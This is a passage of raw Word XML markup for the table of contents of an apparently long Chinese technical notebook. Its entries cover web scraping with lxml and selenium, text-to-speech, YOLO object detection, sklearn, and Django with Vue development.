              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780047" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>根据</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>xpath</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>选取页面内容：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>lxml</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780047 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>623</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4453A623" w14:textId="2424C8D5" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780048" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>selenium</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780048 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>624</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="581964C1" w14:textId="4586C676" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780049" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>安装</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>selenium</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780049 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>624</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="613B2A5C" w14:textId="00137813" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780050" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ubuntu</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>下载</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>chrome</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780050 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>625</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="35D4FAFE" w14:textId="419F5107" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780051" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>安装</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>chromedriver</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780051 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>625</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="46ADA782" w14:textId="68F37AB3" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780052" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>测试</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>selenium</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780052 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>625</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0EFFF9C6" w14:textId="0FE53585" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780053" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>语音控制：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Python3.7 + Yolo3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780053 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>626</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0D1DE8B7" w14:textId="02E50FDD" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780054" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>windows</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>本地库进行语音阅读</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780054 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>626</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4F756868" w14:textId="18298FE6" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780055" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>pyttsx3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780055 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>626</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="663332E6" w14:textId="5FC30EF4" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780056" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ML</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>sklearn</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780056 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>626</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="55348895" w14:textId="14453C66" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780057" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>github.com/ultralytics/yolov5:</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>视频处理</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780057 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>627</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5B688C9A" w14:textId="307C242F" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780058" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>测试摄像头</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780058 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>627</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="54E6CCEE" w14:textId="08831836" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780059" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>前端</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780059 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>628</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3550B043" w14:textId="041F9DBB" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780060" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>快速前端：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>www.layoutit.com/build</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780060 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>628</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7386C018" w14:textId="74112042" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780061" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">windows server 2012 </w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>添加摄像头</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780061 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>628</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="13845D0C" w14:textId="50C4AF92" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780062" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Django+VUE</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>前后端分离</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780062 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>629</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="57F24071" w14:textId="0268E21C" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780063" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>django-rest-framework(DRF):</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>后端</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>API</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>服务的常用插件</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780063 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
